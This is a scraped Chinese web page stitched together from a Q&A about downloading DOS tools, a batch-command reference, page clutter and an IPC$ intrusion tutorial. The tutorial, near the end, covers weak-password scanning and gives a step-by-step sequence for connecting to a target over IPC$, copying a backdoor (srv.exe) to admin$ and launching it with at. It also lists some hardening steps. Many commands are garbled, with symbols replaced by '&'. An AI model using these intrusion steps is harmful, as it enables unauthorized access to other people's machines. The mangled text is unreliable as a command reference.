提供下载MS-DOS命令的站点
提供下载MS-DOS命令的站点
就是在& 刚启动电脑时 进入DOS下 输入的命令
如:FDISK ,DM,`~~
补充:是 下载这些命令的 网站
补充:还是没有 我要的
补充:算了& 只要能有 DM 下载的地址就可以了
不区分大小写匿名
/study/dos2.htm
这有您需要的。
1 echo 和 @回显命令@ #关闭单行回显echo off #从下一行开始关闭回显@echo off #从本行开始关闭回显。一般批处理第一行都是这个echo on #从下一行开始打开回显echo #显示当前是 echo off 状态还是 echo on 状态echo. #输出一个”回车换行”,空白行 & #(同echo, echo+ echo[ echo] echo/ echo)
2 errorlevelecho %errorlevel%每个命令运行结束,可以用这个命令行格式查看返回码默认值为0,一般命令执行出错会设 errorlevel 为1
3 dir显示文件夹内容dir #显示当前目录中的文件和子目录dir /a #显示当前目录中的文件和子目录,包括隐藏文件和系统文件dir c: /a:d #显示 C 盘当前目录中的目录dir c: /a:-d #显示 C 盘根目录中的文件dir c: /b/p #/b只显示文件名,/p分页显示dir *.exe /s #显示当前目录和子目录里所有的.exe文件
4 cd切换目录cd #进入根目录cd #显示当前目录cd /d d:sdk #可以同时更改盘符和目录
5 md创建目录md d:abc #如果 d:a 不存在,将会自动创建中级目录#如果命令扩展名被停用,则需要键入 mkdir abc。
6 rd删除目录rd abc #删除当前目录里的 abc 子目录,要求为空目录rd /s/q d:temp #删除 d:temp 文件夹及其子文件夹和文件,/q安静模式
7 del删除文件del d:test.txt #删除指定文件,不能是隐藏、系统、只读文件del /q/a/f d:temp*.*删除 d:temp 文件夹里面的所有文件,包括隐藏、只读、系统文件,不包括子目录del /q/a/f/s d:temp*.*删除 d:temp 及子文件夹里面的所有文件,包括隐藏、只读、系统文件,不包括子目录
8 ren重命名命令ren d:temp tmp #支持对文件夹的重命名
9 cls清屏
10 type显示文件内容type c:boot.ini #显示指定文件的内容,程序文件一般会显示乱码type *.txt #显示当前目录里所有.txt文件的内容
11 copy拷贝文件copy c:test.txt d:test.bak复制 c:test.txt 文件到 d: ,并重命名为 test.bakcopy con test.txt从屏幕上等待输入,按 Ctrl+Z 结束输入,输入内容存为test.txt文件con代表屏幕,prn代表打印机,nul代表空设备copy 1.txt + 2.txt 3.txt合并 1.txt 和 2.txt 的内容,保存为 3.txt 文件如果不指定 3.txt ,则保存到 1.txtcopy test.txt +复制文件到自己,实际上是修改了文件日期
12 title设置cmd窗口的标题title 新标题 #可以看到cmd窗口的标题栏变了
13 ver显示系统版本
14 label 和 vol设置卷标vol #显示卷标label #显示卷标,同时提示输入新卷标label c:system #设置C盘的卷标为 system
15 pause暂停命令
16 rem 和 ::注释命令注释行不执行操作
17 date 和 time日期和时间date #显示当前日期,并提示输入新日期,按"回车"略过输入date/t #只显示当前日期,不提示输入新日期time #显示当前时间,并提示输入新时间,按"回车"略过输入time/t #只显示当前时间,不提示输入新时间
18 goto 和 :跳转命令:label #行首为:表示该行是标签行,标签行不执行操作goto label #跳转到指定的标签那一行
19 find (外部命令)查找命令find "abc" c:test.txt在 c:test.txt 文件里查找含 abc 字符串的行如果找不到,将设 errorlevel 返回码为1find /i “abc” c:test.txt查找含 abc 的行,忽略大小写find /c "abc" c:test.txt显示含 abc 的行的行数
20 more (外部命令)逐屏显示more c:test.txt #逐屏显示 c:test.txt 的文件内容
21 tree显示目录结构tree d: #显示D盘的文件目录结构
22 &顺序执行多条命令,而不管命令是否执行成功
23 &&顺序执行多条命令,当碰到执行出错的命令后将不执行后面的命令find "ok" c:test.txt && echo 成功如果找到了"ok"字样,就显示"成功",找不到就不显示
24 ||顺序执行多条命令,当碰到执行正确的命令后将不执行后面的命令find "ok" c:test.txt || echo 不成功如果找不到"ok"字样,就显示"不成功",找到了就不显示
25 |管道命令dir *.* /s/a | find /c ".exe"管道命令表示先执行 dir 命令,对其输出的结果执行后面的 find 命令该命令行结果:输出当前文件夹及所有子文件夹里的.exe文件的个数type c:test.txt|more这个和 more c:test.txt 的效果是一样的
26 & 和 &&输出重定向命令& 清除文件中原有的内容后再写入&& 追加内容到文件末尾,而不会清除原有的内容主要将本来显示在屏幕上的内容输出到指定文件中指定文件如果不存在,则自动生成该文件type c:test.txt &prn屏幕上不显示文件内容,转向输出到打印机echo hello world&con在屏幕上显示hello world,实际上所有输出都是默认 &con 的copy c:test.txt f: &nul拷贝文件,并且不显示"文件复制成功"的提示信息,但如果f盘不存在,还是会显示出错信息copy c:test.txt f: &nul 2&nul不显示”文件复制成功”的提示信息,并且f盘不存在的话,也不显示错误提示信息echo ^^W ^& ^W&c:test.txt生成的文件内容为 ^W & W^ 和 & 是控制命令,要把它们输出到文件,必须在前面加个 ^ 符号
27 &从文件中获得输入信息,而不是从屏幕上一般用于 date time label 等需要等待输入的命令@echo offecho &temp.txtdate &temp.txtdel temp.txt这样就可以不等待输入直接修改当前日期
28 %0 %1 %2 %3 %4 %5 %6 %7 %8 %9 %*命令行传递给批处理的参数%0 批处理文件本身%1 第一个参数%9 第九个参数%* 从第一个参数开始的所有参数
批参数(%n)的替代已被增强。您可以使用以下语法:
& %~1 - 删除引号("),扩充 %1 & %~f1 - 将 %1 扩充到一个完全合格的路径名 & %~d1 - 仅将 %1 扩充到一个驱动器号 & %~p1 - 仅将 %1 扩充到一个路径 & %~n1 - 仅将 %1 扩充到一个文件名 & %~x1 - 仅将 %1 扩充到一个文件扩展名 & %~s1 - 扩充的路径指含有短名 & %~a1 - 将 %1 扩充到文件属性 & %~t1 - 将 %1 扩充到文件的日期/时间 & %~z1 - 将 %1 扩充到文件的大小 & %~$PATH : 1 - 查找列在 PATH 环境变量的目录,并将 %1 & 扩充到找到的第一个完全合格的名称。如果环境 & 变量名未被定义,或者没有找到文件,此组合键会 & 扩充到空字符串
可以组合修定符来取得多重结果:
& %~dp1 - 只将 %1 扩展到驱动器号和路径 & %~nx1 - 只将 %1 扩展到文件名和扩展名 & %~dp$PATH:1 - 在列在 PATH 环境变量中的目录里查找 %1, & 并扩展到找到的第一个文件的驱动器号和路径。 & %~ftza1 - 将 %1 扩展到类似 DIR 的输出行。可以参照 call/? 或 for/? 看出每个参数的含意echo load "%%1" "%%2"&c:test.txt生成的文件内容为 load "%1" "%2"批处理文件里,用这个格式把命令行参数输出到文件
29 if判断命令if "%1"=="/a" echo 第一个参数是/aif /i "%1" equ "/a" echo 第一个参数是/a/i 表示不区分大小写,equ 和 == 是一样的,其它运算符参见 if/?if exist c:test.bat echo 存在c:test.bat文件if not exist c:windows ( & echo 不存在c:windows文件夹 & )if exist c:test.bat ( & echo 存在c:test.bat & ) else ( & echo 不存在c:test.bat & )
30 setlocal 和 endlocal设置”命令扩展名”和”延缓环境变量扩充”SETLOCAL ENABLEEXTENSIONS #启用"命令扩展名"SETLOCAL DISABLEEXTENSIONS #停用"命令扩展名"SETLOCAL ENABLEDELAYEDEXPANSION #启用"延缓环境变量扩充"SETLOCAL DISABLEDELAYEDEXPANSION #停用"延缓环境变量扩充"ENDLOCAL #恢复到使用SETLOCAL语句以前的状态“命令扩展名”默认为启用“延缓环境变量扩充”默认为停用批处理结束系统会自动恢复默认值可以修改注册表以禁用"命令扩展名",详见 cmd /? 。所以用到"命令扩展名"的程序,建议在开头和结尾加上 SETLOCAL ENABLEEXTENSIONS 和 ENDLOCAL 语句,以确保程序能在其它系统上正确运行"延缓环境变量扩充"主要用于 if 和 for 的符合语句,在 set 的说明里有其实用例程
31 set设置变量引用变量可在变量名前后加 % ,即 %变量名%set #显示目前所有可用的变量,包括系统变量和自定义的变量echo %SystemDrive% #显示系统盘盘符。系统变量可以直接引用set p #显示所有以p开头的变量,要是一个也没有就设errorlevel=1set p=aa1bb1aa2bb2 #设置变量p,并赋值为 = 后面的字符串,即aa1bb1aa2bb2echo %p% #显示变量p代表的字符串,即aa1bb1aa2bb2echo %p:~6% #显示变量p中第6个字符以后的所有字符,即aa2bb2echo %p:~6,3% #显示第6个字符以后的3个字符,即aa2echo %p:~0,3% #显示前3个字符,即aa1echo %p:~-2% #显示最后面的2个字符,即b2echo %p:~0,-2% #显示除了最后2个字符以外的其它字符,即aa1bb1aa2becho %p:aa=c% #用c替换变量p中所有的aa,即显示c1bb1c2bb2echo %p:aa=% #将变量p中的所有aa字符串置换为空,即显示1bb12bb2echo %p:*bb=c% #第一个bb及其之前的所有字符被替换为c,即显示c1aa2bb2set p=%p:*bb=c% #设置变量p,赋值为 %p:*bb=c% ,即c1aa2bb2set /a p=39 #设置p为数值型变量,值为39set /a p=39/10 #支持运算符,有小数时用去尾法,39/10=3.9,去尾得3,p=3set /a p=p/10 #用 /a 参数时,在 = 后面的变量可以不加%直接引用set /a p=”1&0″ #”与”运算,要加引号。其它支持的运算符参见set/?set p= #取消p变量set /p p=请输入屏幕上显示”请输入”,并会将输入的字符串赋值给变量p注意这条可以用来取代 choice 命令注意变量在 if 和 for 的复合语句里是一次性全部替换的,如@echo offset p=aaaif %p%==aaa ( & echo %p% & set p=bbb & echo %p% & )结果将显示aaaaaa因为在读取 if 语句时已经将所有 %p% 替换为aaa这里的"替换",在 /? 帮助里就是指"扩充"、"环境变量扩充"可以启用”延缓环境变量扩充”,用 ! 来引用变量,即 !变量名!@echo offSETLOCAL ENABLEDELAYEDEXPANSIONset p=aaaif %p%==aaa ( & echo %p% & set p=bbb & echo !p! & )ENDLOCAL结果将显示aaabbb还有几个动态变量,运行 set 看不到%CD% #代表当前目录的字符串%DATE% #当前日期%TIME% #当前时间%RANDOM% #随机整数,介于0~32767%ERRORLEVEL% #当前 ERRORLEVEL 值%CMDEXTVERSION% #当前命令处理器扩展名版本号%CMDCMDLINE% #调用命令处理器的原始命令行可以用echo命令查看每个变量值,如 echo %time%注意 %time% 精确到毫秒,在批处理需要延时处理时可以用到
32 start批处理中调用外部程序的命令,否则等外部程序完成后才继续执行剩下的指令
33 call批处理中调用另外一个批处理的命令,否则剩下的批处理指令将不会被执行有时有的应用程序用start调用出错的,也可以call调用
34 choice (外部命令)选择命令让用户输入一个字符,从而选择运行不同的命令,返回码errorlevel为1234……win98里是win2000pro里没有,可以从win98里拷过来win2003里是choice.exechoice /N /C y /T 5 /D y&nul延时5秒
35 assoc 和 ftype文件关联assoc 设置'文件扩展名'关联,关联到'文件类型'ftype 设置'文件类型'关联,关联到'执行程序和参数'当你双击一个.txt文件时,windows并不是根据.txt直接判断用 notepad.exe 打开而是先判断.txt属于 txtfile '文件类型'再调用 txtfile 关联的命令行 txtfile=%SystemRoot%system32NOTEPAD.EXE %1可以在"文件夹选项"→"文件类型"里修改这2种关联assoc #显示所有'文件扩展名'关联assoc .txt #显示.txt代表的'文件类型',结果显示 .txt=txtfileassoc .doc #显示.doc代表的'文件类型',结果显示 .doc=Word.Document.8assoc .exe #显示.exe代表的'文件类型',结果显示 .exe=exefileftype #显示所有'文件类型'关联ftype exefile #显示exefile类型关联的命令行,结果显示 exefile="%1" %* assoc .txt=Word.Document.8设置.txt为word类型的文档,可以看到.txt文件的图标都变了assoc .txt=txtfile恢复.txt的正确关联ftype exefile="%1" %*恢复 exefile 的正确关联如果该关联已经被破坏,可以运行
,再输入这条命令
36 pushd 和 popd切换当前目录@echo offc: & cd & md mp3 #在 C: 建立 mp3 文件夹md d:mp4 #在 D: 建立 mp4 文件夹cd /d d:mp4 #更改当前目录为 d:mp4pushd c:mp3 #保存当前目录,并切换当前目录为 c:mp3popd #恢复当前目录为刚才保存的 d:mp4
37 for循环命令这个比较复杂,请对照 for/? 来看for %%i in (c: d: e: f:) do echo %%i依次调用小括号里的每个字符串,执行 do 后面的命令注意%%i,在批处理中 for 语句调用参数用2个%默认的字符串分隔符是"空格键","Tab键","回车键"for %%i in (*.txt) do find "abc" %%i对当前目录里所有的txt文件执行 find 命令for /r . %%i in (*.txt) do find "abc" %%i在当前目录和子目录里所有的.txt文件中搜索包含 abc 字符串的行for /r . %%i in (.) do echo %%~pni显示当前目录名和所有子目录名,包括路径,不包括盘符for /r d:mp3 %%i in (*.mp3) do echo %%i&&d:mp3.txt把 d:mp3 及其子目录里的mp3文件的文件名都存到 d:mp3.txt 里去for /l %%i in (2,1,8) do echo %%i生成2345678的一串数字,2是数字序列的开头,8是结尾,1表示每次加1for /f %%i in ('set') do echo %%i对 set 命令的输出结果循环调用,每行一个for /f "eol=P" %%i in ('set') do echo %%i取 set 命令的输出结果,忽略以 P 开头的那几行for /f %%i in (d:mp3.txt) do echo %%i显示 d:mp3.txt 里的每个文件名,每行一个,不支持带空格的名称for /f "delims=" %%i in (d:mp3.txt) do echo %%i显示 d:mp3.txt 里的每个文件名,每行一个,支持带空格的名称for /f "skip=5 tokens=4" %%a in ('dir') do echo %%a对 dir 命令的结果,跳过前面5行,余下的每行取第4列每列之间的分隔符为默认的"空格"可以注意到 dir 命令输出的前5行是没有文件名的for /f "tokens=1,2,3 delims=- " %%a in ('date /t') do ( & echo %%a & echo %%b & echo %%c & )对 date /t 的输出结果,每行取1、2、3列第一列对应指定的 %%a ,后面的 %%b 和 %%c 是派生出来的,对应其它列分隔符指定为 - 和"空格",注意 delims=- 后面有个"空格"其中 tokens=1,2,3 若用 tokens=1-3 替换,效果是一样的for /f "tokens=2* delims=- " %%a in ('date /t') do echo %%b取第2列给 %%a ,其后的列都给 %%b
38 subst (外部命令)映射磁盘。subst z: serverd #这样输入z:就可以访问serverd了subst z: /d #取消该映射subst #显示目前所有的映时
39 xcopy (外部命令)文件拷贝xcopy d:mp3 e:mp3 /s/e/i/y复制 d:mp3 文件夹、所有子文件夹和文件到 e: ,覆盖已有文件加 /i 表示如果 e: 没有 mp3 文件夹就自动新建一个,否则会有询问
/soft/
DOS之家
<-dos.net
&
中国dos联盟
或者你安装一个DOS工具吧,矮人DOS之类的。。。里面有你所需要的DM FDISK之类的工具。
不行啊 我不能进入系统·~
http://www.onlinedown.net/soft/13340.htm
这个是DM 万用版
.cn/html_2/1/67/id=4430&pn=0.html
&Smart FDISK 2.05 简体中文版
你下载这两个工具后,存放到硬盘里(注意:一定要FAT32格式的分区,不然DOS找不到该分区)比如你放到D盘的 DOS 文件夹(如果是压缩包要解压哦,还有文件夹不能为中文名,DOS不能正确识别中文),确认是FAT32格式的分区了,然后就继续下载一个DOS工具箱,或者直接用启动光盘启动电脑进入DOS。
然后到D盘找到 DOS 文件夹。那么出现在你面前的就是这两个工具了。这样你就不是在WIN 系统下运行了。
怎么存放·~我系统都没~~怎么存放啊~~我用的是 U盘·
去下载个系统盘提取除开啊 呵呵
DM不是DOS命令,只是个在DOS下运行的软件,就像QQ不是windows文件一样,MAXDOS好像带DM和序,一般的装机盘也带有,要DM可以去提取
相关知识等待您来回答
操作系统领域专家MaxDOS说明文件_百度文库
两大类热门资源免费畅读
续费一年阅读会员,立省24元!
文档贡献者贡献于
评价文档:
25页免费5页免费8页免费9页免费8页免费 8页免费7页免费7页免费16页7下载券1页免费
喜欢此文档的还喜欢25页免费5页免费2页免费13页免费8页免费
MaxDOS说明文件|
把文档贴到Blog、BBS或个人站等:
普通尺寸(450*500pix)
较大尺寸(630*500pix)
大小:13.20KB
登录百度文库,专享文档复制特权,财富值每天免费拿!
你可能喜欢maxdos下的DISKGEN命令详解_百度文库
两大类热门资源免费畅读
续费一年阅读会员,立省24元!
评价文档:
25页免费16页免费14页免费5页免费21页免费 13页免费8页免费8页免费14页免费4页免费
喜欢此文档的还喜欢12页1下载券13页2下载券28页免费14页免费25页免费
maxdos下的DISKGEN命令详解|
把文档贴到Blog、BBS或个人站等:
普通尺寸(450*500pix)
较大尺寸(630*500pix)
你可能喜欢为什么我在格式化的时候会出现。不是内部或外部命令,也不是可运行的程序_百度知道
为什么我在格式化的时候会出现。不是内部或外部命令,也不是可运行的程序
命令: dir 列文件名
deltree 删除目录树
cd 改变当前目录 copy 拷贝文件
diskcopy 复制磁盘
del 删除文件
format 格式化磁盘 edit 文本编辑
mem 查看内存状况
md 建立子目录
move 移动文件、改目录名 more 分屏显示
type 显示文件内容
rd 删除目录
sys 制作DOS系统盘 ren 改变文件名
xcopy 拷贝目录与文件
chkdsk 检查磁盘
attrib 设置文件属性 fdisk 硬盘分区
date 显示及修改号期
label 设置卷标号
defrag 磁盘碎片整理 msd 系统检测
path 设置搜寻目录
share 文件共享
memmaker内存优化管理 help 帮助
restore 恢复备份文件
set 设置环境变量
time 显示及修改时间 tree 列目录树
debug 随机调试程序
doskey 重新调用DOS命令
prempt 设置提示符
undelete恢复被删的文件
scandisk检测、修理磁盘
常用命令具体介绍:
显示目录文件和子目录列表,呵呵,这个当然是人人要知道的。
可以使用通配符(? 和 *),?表通配一个字符,*表通配任意字符
指定要查看后缀的文件。 上面其实也可以为“ . 后缀”,例如dir *.exe 等于dir .exe
每次显示一个列表屏幕。要查看下一屏,请按键盘上的任意键。
以宽格式显示列表,在每一行上最多显示 5 个文件名或目录名。
列出指定目录及所有子目录中出现的每个指定的文件名。比win环境下的查找快多了
dir *.* -& a.txt 把当前目录文件列表写入a.txt
dir *.* /s -& a.txt 把当前目录文件列表写入a.txt,包括子目录下文件。
二、Attrib
显示、设置或删除指派给文件或目录的只读、存档、系统以及隐藏属性。如果在不含参数的情况下使用,则 attrib 会显示当前目录中所有文件的属性。
设置只读属性。
清除只读属性。
设置存档文件属性。
清除存档文件属性。
设置系统属性。
清除系统属性。
设置隐藏属性。
清除隐藏属性。
清除显示在命令提示符窗口中的所有信息,并返回空窗口,即“清屏”
退出当前命令解释程序并返回到系统。
五、format
执行快速格式化。删除以前已格式化卷的文件表和根目录,但不在扇区之间扫描损坏区域。使用 /q 命令行选项应该仅格式化以前已格式化的完好的卷。
六、Ipconfig
显示所有当前的 TCP/IP 网络配置值、刷新动态主机配置协议 (DHCP) 和域名系统 (DNS) 设置。使用不带参数的 ipconfig 可以显示所有适配器的 IP 地址、子网掩码、默认网关。
显示所有适配器的完整 TCP/IP 配置信息。
ipconfig 等价于 winipcfg,后者在ME、98 和 95 上可用。尽管 Windows XP 没有提供象 winipcfg 命令一样的图形化界面,但可以使用“网络连接”查看和更新 IP 地址。要做到这一点,请打开 网络连接,右键单击某一网络连接,单击“状态”,然后单击“支持”选项卡。
该命令最适用于配置为自动获取 IP 地址的计算机。它使用户可以确定哪些 TCP/IP 配置值是由 DHCP、自动专用 IP 地址 (APIPA) 和其他配置配置的。
创建目录或子目录
将一个或多个文件从一个目录移动到指定的目录。
九、Nbtstat
显示本地计算机和远程计算机的基于 TCP/IP (NetBT) 协议的 NetBIOS 统计资料、NetBIOS 名称表和 NetBIOS 名称缓存。Nbtstat 可以刷新 NetBIOS 名称缓存和注册的 Windows Internet 名称服务 (WINS) 名称。使用不带参数的 nbtstat 显示帮助。Nbtstat 命令行参数区分大小写。
-a remotename
显示远程计算机的 NetBIOS 名称表,其中,RemoteName 是远程计算机的 NetBIOS 计算机名称。
-A IPAddress
显示远程计算机的 NetBIOS 名称表,其名称由远程计算机的 IP 地址指定(以小数点分隔)。
十、Netstat
显示活动的 TCP 连接、计算机侦听的端口、以太网统计信息、IP 路由表、IPv4 统计信息(对于 IP、ICMP、TCP 和 UDP 协议)以及 IPv6 统计信息(对于 IPv6、ICMPv6、通过 IPv6 的 TCP 以及通过 IPv6 的 UDP 协议)。使用时如果不带参数,netstat 显示活动的 TCP 连接。
显示所有活动的 TCP 连接以及计算机侦听的 TCP 和 UDP 端口。
十一、Ping
通过发送“网际消息控制协议 (ICMP)”回响请求消息来验证与另一台 TCP/IP 计算机的 IP 级连接。回响应答消息的接收情况将和往返过程的次数一起显示出来。Ping 是用于检测网络连接性、可到达性和名称解析的疑难问题的主要 TCP/IP 命令。如果不带参数,ping 将显示帮助。名称和Ip地址解析是它的最简单应用也是用的最多的。
指定在中断前 ping 可以持续发送回响请求信息到目的地。要中断并显示统计信息,请按 CTRL-BREAK。要中断并退出 ping,请按 CTRL-C。
指定发送的回响请求消息中“数据”字段的长度(以字节表示)。默认值为 32。size 的最大值是 65,527。
十二、Rename (Ren)
更改文件的名称。
例如 ren *.abc *.cba
显示、设置或删除环境变量。如果没有任何参数,set 命令将显示当前环境设置。
十四、Shutdown
允许您关闭或重新启动本地或远程计算机。如果没有使用参数,shutdown 将注销当前用户。
-m ComputerName
指定要关闭的计算机。
将用于系统关闭的定时器设置为 xx 秒。默认值是 20 秒。
注销当前用户,这是默认设置。-m ComputerName 优先。
关闭本地计算机。
关闭之后重新启动。
中止关闭。除了 -l 和 ComputerName 外,系统将忽略其它参数。在超时期间,您只可以使用 -a。
十五、System File Checker (sfc)
win下才有,在重新启动计算机后扫描和验证所有受保护的系统文件。
立即扫描所有受保护的系统文件。
一次扫描所有受保护的系统文件。
/purgecache
立即清除“Windows 文件保护”文件高速缓存,并扫描所有受保护的系统文件。
/cachesize=x
设置“Windows 文件保护”文件高速缓存的大小,以 MB 为单位。
十六、type
显示文本文件的内容。使用 type 命令查看文本文件或者是bat文件而不修改文件
十七、Tree
图像化显示路径或驱动器中磁盘的目录结构。
十八、Xcopy
复制文件和目录,包括子目录。
复制非空的目录和子目录。如果省略 /s,xcopy 将在一个目录中工作。
复制所有子目录,包括空目录。
十九、copy
将一个或多个文件从一个位置复制到其他位置
删除指定文件。
ftp和bat批命令和net和telnet由于子命令太多,这里不说了,不过这几个都是常用到的。 IPC$命令详解: 网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄. 不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的许多迷惑(你随便找一个hack论坛搜一下ipc,看存在的疑惑有多少). 因此我写了这篇相当于解惑的教程.想把一些容易混淆,容易迷惑人的问题说清楚,让大家不要总徘徊在原地!如果你看完这篇帖子仍有疑问,请马上回复! 二 什么是ipc$ IPC$(Internet Process Connection)是共享&命名管道&的资源(大家都是这么说的),它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。 利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的),而利用这个空的连接,连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。 我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)。 所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用心者(到底是什么用心?我也不知道,代词一个)会利用IPC$,访问共享资源,导出用户列表,并使用一些字典工具,进行密码探测,寄希望于获得更高的权限,从而达到不可告人的目的. 解惑: 1)IPC连接是Windows NT及以上系统中特有的远程网络登陆功能,其功能相当于Unix中的Telnet,由于IPC$功能需要用到Windows NT中的很多DLL函数,所以不能在Windows 9.x中运行。 也就是说只有nt/2000/xp才可以建立ipc$连接,98/me是不能建立ipc$连接的(但有些朋友说在98下能建立空的连接,不知道是真是假,不过现在都2003年了,建议98的同志换一下系统吧,98不爽的) 2)即使是空连接也不是100%都能建立成功,如果对方关闭了ipc$共享,你仍然无法建立连接 3)并不是说建立了ipc$连接就可以查看对方的用户列表,因为管理员可以禁止导出用户列表 三 建立ipc$连接在hack攻击中的作用 就像上面所说的,即使你建立了一个空的连接,你也可以获得不少的信息(而这些信息往往是入侵中必不可少的),访问部分共享,如果你能够以某一个具有一定权限的用户身份登陆的话,那么你就会得到相应的权限,显然,如果你以管理员身份登陆,嘿嘿,就不用我在多说了吧,what u want,u can do!! (基本上可以总结为获取目标信息、管理目标进程和服务,上传木马并运行,如果是2000server,还可以考虑开启终端服务方便控制.怎么样?够厉害吧!) 不过你也不要高兴的太早,因为管理员的密码不是那么好搞到的,虽然会有一些傻傻的管理员用空口令或者弱智密码,但这毕竟是少数,而且现在不比从前了,随着人们安全意识的提高,管理员们也愈加小心了,得到管理员密码会越来越难的:(
因此今后你最大的可能就是以极小的权限甚至是没有权限进行连接,你会慢慢的发现ipc$连接并不是万能的,甚至在主机不开启ipc$共享时,你根本就无法连接. 所以我认为,你不要把ipc$入侵当作终极武器,不要认为它战无不胜,它就像是足球场上射门前的传球,很少会有致命一击的效果,但却是不可缺少的,我觉得这才是ipc$连接在hack入侵中的意义所在. 四 ipc$与空连接,139,445端口,默认共享的关系 以上四者的关系可能是菜鸟很困惑的一个问题,不过大部分文章都没有进行特别的说明,其实我理解的也不是很透彻,都是在与大家交流中总结出来的.(一个有良好讨论氛围的BBS可以说是菜鸟的天堂) 1)ipc$与空连接: 不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了. 许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟). 2)ipc$与139,445端口: ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的. 3)ipc$与默认共享 默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问(前提是对方没有关闭这些默认共享)
五 ipc$连接失败的原因 以下5个原因是比较常见的: 1)你的系统不是NT或以上****作系统; 2)对方没有打开ipc$默认共享 3)对方未开启139或445端口(惑被防火墙屏蔽) 4)你的命令输入有误(比如缺少了空格等) 5)用户名或密码错误(空连接当然无所谓了) 另外,你也可以根据返回的错误号分析原因:
错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限;
错误号51,Windows 无法找到网络路径 : 网络有问题;
错误号53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);
错误号67,找不到网络名 : 你的lanmanworkstation服务未启动;目标删除了ipc$;
错误号1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个ipc$,请删除再连。
错误号1326,未知的用户名或错误密码 : 原因很明显了;
错误号1792,试图登录,但是网络登录服务没有启动 : 目标NetLogon服务未启动。(连接域控会出现此情况)
错误号2242,此用户的密码已经过期 : 目标有帐号策略,强制定期要求更改密码。
关于ipc$连不上的问题比较复杂,除了以上的原因,还会有其他一些不确定因素,在此本人无法详细而确定的说明,就*大家自己体会和试验了. &br&六
如何打开目标的IPC$(此段引自相关文章)
首先你需要获得一个不依赖于ipc$的shell,比如sql的cmd扩展、telnet、木马,当然,这shell必须是admin权限的,然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上面可以知道,ipc$能否使用还有很多条件。请确认相关服务都已运行,没有就启动它(不知道怎么做的请看net命令的用法),还是不行的话(比如有防火墙,杀不了)建议放弃。
如何防范ipc$入侵 1禁止空连接进行枚举(此****作并不能阻止空连接的建立,引自《解剖win2000下的空会话》) 首先运行regedit,找到如下组建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为:(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等) 2禁止默认共享 1)察看本地共享资源 运行-cmd-输入net share 2)删除共享(每次输入一个) net share ipc$ /delete net share admin$ /delete net share c$ /delete net share d$ /delete(如果有e,f,……可以继续删除) 3)停止server服务 net stop server /y (重新启动后server服务会重新开启) 4)修改注册表 运行-regedit server版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的键值改为:。
pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的键值改为:。
如果上面所说的主键不存在,就新建(右击-新建-双字节值)一个主健再改键值。
3永久关闭ipc$和默认共享依赖的服务:lanmanserver即server服务 控制面板-管理工具-服务-找到server服务(右击)-属性-常规-启动类型-已禁用 4安装防火墙(选中相关设置),或者端口过滤(滤掉139,445等),或者用新版本的优化大师 5设置复杂密码,防止通过ipc$穷举密码 八 相关命令 1)建立空连接: net use $&&\\IP\ipc$ && /user:&&
(一定要注意:这一行命令中包含了3个空格)
2)建立非空连接: net use $&&\\IP\ipc$ &用户名& /user:&密码&
(同样有3个空格) 3)映射默认共享: net use z: $&&\\IP\c$ &密码& /user:&用户名&
(即可将对方的c盘映射为自己的z盘,其他盘类推) 如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令 net use z: $&&\\IP\c$ 4)删除一个ipc$连接 net use $&&\\IP\ipc$ /del
5)删除共享映射 net use c: /del 删除映射的c盘,其他盘类推
net use * /del 删除全部,会有提示要求按y确认 九 经典入侵模式 这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈)
11. C:\&net use $&&\\127.0.0.1\IPC$ &密码& /user:&用户名&
一般用流光,通过扫描弱口令来得到,管理员帐号和密码. 2. C:\© srv.exe $&&\\127.0.0.1\admin$
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
3. C:\&net time \\127.0.0.1
查查时间,发现127.0.0.1 的当前时间是
上午 11:00,命令成功完成。
4. C:\&at \\127.0.0.1 11:05 srv.exe
用at命令启动srv.exe吧 5. C:\&net time \\127.0.0.1 再查查到时间没有?如果127.0.0.1 的当前时间是
上午 11:05,那就准备开始下面的命令。
